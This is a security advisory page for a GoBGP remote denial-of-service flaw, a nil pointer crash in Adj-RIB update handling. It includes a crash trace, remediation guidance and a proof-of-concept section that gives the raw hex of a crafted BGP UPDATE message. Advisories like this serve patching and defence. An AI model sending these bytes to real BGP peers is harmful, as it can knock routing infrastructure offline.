GoBGP CVE-2026-42285
HIGHSeverity by source
AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
Primary rating from GitHub Advisory.
CVSS VectorGitHub Advisory
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
Lifecycle Timeline
2DescriptionGitHub Advisory
Summary
Remote Denial of Service (DoS) via Nil Pointer Dereference in BGP Update Processing An unauthenticated remote BGP peer can trigger a fatal panic in GoBGP by sending a specially crafted BGP UPDATE message. When the server receives a message with inconsistent attribute lengths, it improperly handles the internal state transition to a "withdraw" action, leading to a nil pointer dereference in the AdjRib.Update function. This causes the entire GoBGP process to crash, resulting in a complete loss of service availability.
Details
The vulnerability originates in the interaction between the BGP message decoding logic and the Adj-RIB table management.
Triggering Condition: When a BGP UPDATE message contains attributes that fail validation (e.g., "attribute value length is short"), GoBGP logs a warning: the received Update message was treated as withdraw.
Code Path:
The message reaches github.com/osrg/gobgp/v4/pkg/server.(*peer).handleUpdate.
Due to the malformed attributes, the message is processed as a withdrawal, but the internal representation of the path or its attributes becomes nil.
The execution flows to internal/pkg/table/adj.go:127 within (*AdjRib).Update.
The Flaw: At line 127 in adj.go, the code attempts to access a member of a structure (likely the path or a specific attribute container) that is nil due to the previous validation failure.
Log Snippet:
{"time":"2026-04-21T12:43:10.009107962+08:00","level":"WARN","msg":"the received Update message was treated as withdraw","Topic":"Peer","Key":"192.168.31.195","State":"BGP_FSM_ESTABLISHED","Error":"attribute value length is short"}
panic: runtime error: invalid memory address or nil pointer dereference
[signal SIGSEGV: segmentation violation code=0x1 addr=0x8 pc=0xbca9e8]
goroutine 52 [running]:
github.com/osrg/gobgp/v4/internal/pkg/table.(*AdjRib).Update(0x1fec929b4480, {0x1fec928ca0e8, 0x1, 0xfffffffffffffffc?})
/home/base/Desktop/gobgp/internal/pkg/table/adj.go:127 +0xa8
github.com/osrg/gobgp/v4/pkg/server.(*peer).handleUpdate(0x1fec92b90c40, 0x1fec92c0c900)
/home/base/Desktop/gobgp/pkg/server/peer.go:656 +0xed4
github.com/osrg/gobgp/v4/pkg/server.(*BgpServer).handleFSMMessage(0x1fec928c8488, 0x1fec92b90c40, 0x1fec92c0c900)
/home/base/Desktop/gobgp/pkg/server/server.go:1670 +0x14c6
github.com/osrg/gobgp/v4/pkg/server.(*BgpServer).startFsmHandler.func1(0x1fec935c0b00?)
/home/base/Desktop/gobgp/pkg/server/server.go:253 +0x25
github.com/osrg/gobgp/v4/pkg/server.(*fsmHandler).recvMessageloop(0x1fec92acee40, {0x105c750, 0x1fec92970500}, {0x106a558, 0x1fec933bc000}, 0x1fec92c1a2a0, 0x1fec92c18a10, 0x0?)
/home/base/Desktop/gobgp/pkg/server/fsm.go:1893 +0xe82
created by github.com/osrg/gobgp/v4/pkg/server.(*fsmHandler).established in goroutine 37
/home/base/Desktop/gobgp/pkg/server/fsm.go:1920 +0x2d5
PoC
[SEND] OPEN
Data: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 1d 01 04 fd ea 00 5a c3 a8 1f c3 00
[RECV] Type: 1 | Length: 77
Data: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 4d 01 04 fd e9 00 5a c0 a8 1f 82 30 02 2e 02 00 49 16 14 62 61 73 65 2d 76 69 72 74 75 61 6c 2d 6d 61 63 68 69 6e 65 00 01 04 00 19 00 46 41 04 00 00 fd e9 05 06 00 19 00 46 00 02
[+] Received OPEN from peer
[SEND] KEEPALIVE
Data: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 13 04
[RECV] Type: 4 | Length: 19
Data: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 13 04
[+] BGP Session Established
[SEND] Crafted UPDATE
Data: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 50 02 00 04 18 ac 10 01 00 35 35 01 01 04 2d 02 00 90 0e 00 19 3e 01 a8 c0 1f 82 00 02 21 00 01 c0 a8 1f 12 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 00 11 22 33 44 55 0f 11 80 00
[*] Waiting for peer reaction...
[+] Done.Impact
Remote Denial of Service (DoS) in GoBGP v4.4.0
AnalysisAI
GoBGP v4.4.0 crashes with SIGSEGV panic when an unauthenticated remote BGP peer sends malformed UPDATE messages with inconsistent attribute lengths. The nil pointer dereference in AdjRib.Update (adj.go:127) causes complete process termination and loss of BGP service. Publicly available exploit code exists (POC in GitHub advisory GHSA-p3w2-64xm-833j). Vendor-released patch available in v4.5.0. CVSS 7.5 (AV:N/AC:L/PR:N/UI:N) reflects the trivial remote exploitation of critical network infrastructure with no mitigating factors.
Technical ContextAI
GoBGP is a BGP (Border Gateway Protocol) implementation written in Go, used for routing table management in network infrastructure. The vulnerability (CWE-476: NULL Pointer Dereference) occurs during BGP UPDATE message processing when the packet decoder encounters malformed path attributes. RFC 4271 requires BGP implementations to validate UPDATE message attribute lengths before processing. When GoBGP receives attributes with invalid lengths (e.g., 'attribute value length is short'), the validation logic correctly flags the error and logs a warning, intending to treat the message as a withdrawal. However, the error handling path fails to properly initialize or null-check the internal path representation before passing it to the Adjacency Routing Information Base (Adj-RIB) update function. The Adj-RIB maintains per-peer routing state, and at line 127 of internal/pkg/table/adj.go, the Update method attempts to dereference a structure member on the nil path object without validation, triggering a segmentation fault (SIGSEGV). The panic propagates through the goroutine handling the BGP finite state machine (FSM), terminating the entire GoBGP server process rather than just resetting the affected peer session. The affected package is github.com/osrg/gobgp/v4, specifically version 4.4.0, as identified by CPE pkg:go/github.com_osrg_gobgp_v4.
RemediationAI
Upgrade immediately to GoBGP v4.5.0 or later from https://github.com/osrg/gobgp/releases/tag/v4.5.0. The release notes confirm commit 4d098c9048c54efd5520b4f5c75fd8e69feefab1 and subsequent fixes address the nil pointer dereference. The upgrade process involves replacing the GoBGP binary and restarting the service; BGP sessions will re-establish automatically, but expect brief routing convergence delays during restart. If immediate upgrade is not feasible, implement strict BGP peer filtering to accept sessions only from explicitly trusted autonomous systems with verified identities, and enforce BGP session authentication using TCP MD5 signatures (RFC 2385) or TCP-AO (RFC 5925) on all peering sessions. Note that authentication only prevents unauthorized peers from connecting - it does not prevent a compromised legitimate peer from exploiting the vulnerability. Deploy network-level access controls (firewall rules) to restrict TCP port 179 access exclusively to known BGP peer IP addresses. Monitor GoBGP process health with automatic restart mechanisms (systemd watchdog, supervisord) to minimize downtime if exploitation occurs, but recognize this is a mitigation of impact, not prevention of the underlying vulnerability. Log all BGP session establishments and unexpected process terminations for incident detection. These workarounds carry operational overhead and do not eliminate risk; vendor patch is the only complete remediation.
Same weakness CWE-476 – NULL Pointer Dereference
View allSame technique Denial Of Service
View allVendor StatusVendor
SUSE
Severity: HighShare
External POC / Exploit Code
Leaving vuln.today
GHSA-p3w2-64xm-833j